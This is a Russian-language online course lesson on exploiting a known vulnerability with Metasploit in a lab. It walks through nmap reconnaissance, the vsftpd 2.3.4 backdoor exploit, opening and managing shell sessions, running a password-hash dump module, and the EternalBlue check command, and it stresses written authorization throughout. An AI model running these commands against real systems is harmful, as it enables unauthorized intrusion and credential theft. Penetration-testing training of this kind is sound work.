0Pricing
Cyber Security Academy · Урок

Эксплуатация известной уязвимости

Используйте модуль эксплойта против уязвимой цели в лаборатории и анализируйте вывод сеанса.

«Эксплуатация известной уязвимости» — бесплатный урок Cyber Security Academy на CoddyKit. Это урок 2 из 4. Ты можешь прочитать весь урок бесплатно ниже — а потом практиковать его прямо в браузере с встроенным редактором кода и ИИ-репетитором 24/7. Это часть пути обучения Cyber Security Academy, и твой прогресс синхронизируется между веб-версией и приложением CoddyKit. Курс Cyber Security Academy содержит 4 уроков всего.

Сначала этика и разрешение

Эксплуатация разрешена только против систем, которыми вы владеете или на проверку которых у вас есть явное письменное разрешение. Все приведённые здесь примеры предназначены для санкционированных лабораторных сред. Несанкционированная эксплуатация является уголовным преступлением.

Рекомендации по настройке лаборатории

Используйте намеренно уязвимые виртуальные машины: Metasploitable2/3, DVWA, машины VulnHub или HackTheBox/TryHackMe для законной практики. Никогда не проводите проверки в производственных системах или реальных системах без подписанного документа с согласованными границами работ.

# Download Metasploitable2
# https://sourceforge.net/projects/metasploitable/

# Or use VulnHub
# https://www.vulnhub.com/

# Network: host-only adapter (isolated)

Разведка перед эксплуатацией

Всегда собирайте сведения перед эксплуатацией. Узнайте точную версию службы, OS и контекст, прежде чем выбирать эксплойт. Неправильная версия означает неудачный эксплойт или сбой системы.

sudo nmap -sV -O 192.168.1.100

# Identify:
# - OS version
# - Service + exact version
# - Open ports
# Then search Metasploit for matching exploit

Выбор подходящего эксплойта

Выполняйте поиск по имени и версии службы. Предпочитайте модули с рейтингом Excellent или Great. Прочитайте info, чтобы убедиться, что целевая платформа и диапазон версий совпадают.

msf6 > search vsftpd 2.3.4
# exploit/unix/ftp/vsftpd_234_backdoor
# Rank: Excellent

msf6 > info exploit/unix/ftp/vsftpd_234_backdoor

Настройка и запуск эксплойта

Задайте RHOSTS (удалённая цель), LHOST (ваш IP для обратных подключений), LPORT (порт прослушивания), выберите полезную нагрузку и запустите её. Следите за созданием сеанса или сообщениями об ошибках.

msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > set RHOSTS 192.168.1.100
msf6 > set payload cmd/unix/interact
msf6 > run

# [*] Command shell session 1 opened

Интерпретация результатов

Успешный эксплойт открывает сеанс. При неудачном эксплойте отображаются сообщения об ошибках: соединение отклонено (порт закрыт), эксплойт не сработал (неправильная версия), сеанс не создан (полезной нагрузке не удалось подключиться обратно).

# Success:
[*] Started reverse TCP handler
[*] Command shell session 1 opened

# Failure:
[-] Exploit aborted: Bad return value from check
[-] Exploit failed: No session was created

Взаимодействие с сеансом

После эксплуатации взаимодействуйте с сеансом с помощью sessions -i . Обычные сеансы командной оболочки предоставляют терминал, а сеансы Meterpreter — расширенный API.

msf6 > sessions          # list all sessions
msf6 > sessions -i 1     # interact with session 1

# Once inside:
id
whoami
ifconfig
uname -a

Фоновый режим и несколько сеансов

Нажмите Ctrl+Z, чтобы перевести сеанс в фоновый режим и вернуться в msfconsole. Это позволяет управлять несколькими сеансами или запускать модули постэксплуатации для определённого сеанса.

# Background active session
Ctrl+Z

# List sessions
msf6 > sessions

# Run post module against session 1
msf6 > use post/linux/gather/hashdump
msf6 > set SESSION 1
msf6 > run

Команда проверки

Во многих модулях эксплойтов есть команда check, которая проверяет уязвимость цели, не выполняя сам эксплойт. Если такая команда доступна, всегда сначала запускайте её.

msf6 exploit(ms17_010_eternalblue) > check

# [+] 192.168.1.100:445 - The target is vulnerable.
# Or:
# [-] 192.168.1.100:445 - The target is not vulnerable.

Факторы надёжности эксплойтов

Эксплойты могут привести к сбою служб, вызвать срабатывание оповещений или оставить журналы. При проверках производственных систем запускайте эксплойты в периоды низкой нагрузки, подготовьте план отката и убедитесь в наличии резервных копий, прежде чем выполнять потенциально разрушительные действия.

Документирование эксплуатации

Записывайте время, IP-адрес и порт цели, использованный модуль эксплойта, номер CVE, использованную полезную нагрузку, полученный сеанс и подтверждение (снимок экрана или вывод терминала). Это доказательство уязвимости для отчёта.

Быстрая проверка

Что делает команда Metasploit «check»?

Итоги: эксплуатация уязвимостей

Этичная эксплуатация следует чёткому процессу: получите письменное разрешение, тщательно соберите сведения, выберите подходящий эксплойт, прочитайте информацию о модуле, при наличии сначала выполните проверку, запустите эксплойт и всё задокументируйте. Никогда не выполняйте эксплуатацию без разрешения — технические навыки и этические границы неразделимы.

Часто задаваемые вопросы

Урок «Эксплуатация известной уязвимости» бесплатный?

Да — полный текст урока «Эксплуатация известной уязвимости» бесплатно доступен здесь в веб-версии. Чтобы практиковать его интерактивно (встроенный редактор кода и ИИ-репетитор 24/7) и разблокировать остальной курс Cyber Security Academy, подпишись на CoddyKit PRO. Курс Cyber Security Academy содержит 4 уроков всего.

Чему я научусь в уроке «Эксплуатация известной уязвимости»?

Используйте модуль эксплойта против уязвимой цели в лаборатории и анализируйте вывод сеанса. Ты практикуешь Cyber Security Academy с помощью реального кода, который запускаешь прямо в браузере, и ИИ-репетитор 24/7 отвечает на твои вопросы во время урока.

Нужен ли мне опыт, чтобы начать Cyber Security Academy?

Предыдущий опыт не требуется. Cyber Security Academy на CoddyKit структурирован для всех уровней — от новичков до продвинутых, поэтому ты можешь начать отсюда или с самого начала и учиться в своем темпе. Это урок 2 из 4.

Сколько времени занимает урок «Эксплуатация известной уязвимости»?

Большинство уроков CoddyKit занимают около 5–10 минут. Каждый из них компактный и интерактивный, поэтому ты постоянно делаешь прогресс и продолжаешь с того же места в веб-версии и приложении.

Можно ли писать и запускать код в этом уроке Cyber Security Academy?

Да. Каждый урок Cyber Security Academy включает встроенный редактор кода, поэтому ты пишешь и запускаешь реальный код прямо в браузере и получаешь моментальную обратную связь от AI — локальная установка не требуется.

Все уроки этого курса

  1. Архитектура Metasploit и msfconsole
  2. Эксплуатация известной уязвимости
  3. Полезные нагрузки: поэтапные и цельные, Meterpreter
  4. Постэксплуатация: перемещение и закрепление
← Назад к Cyber Security Academy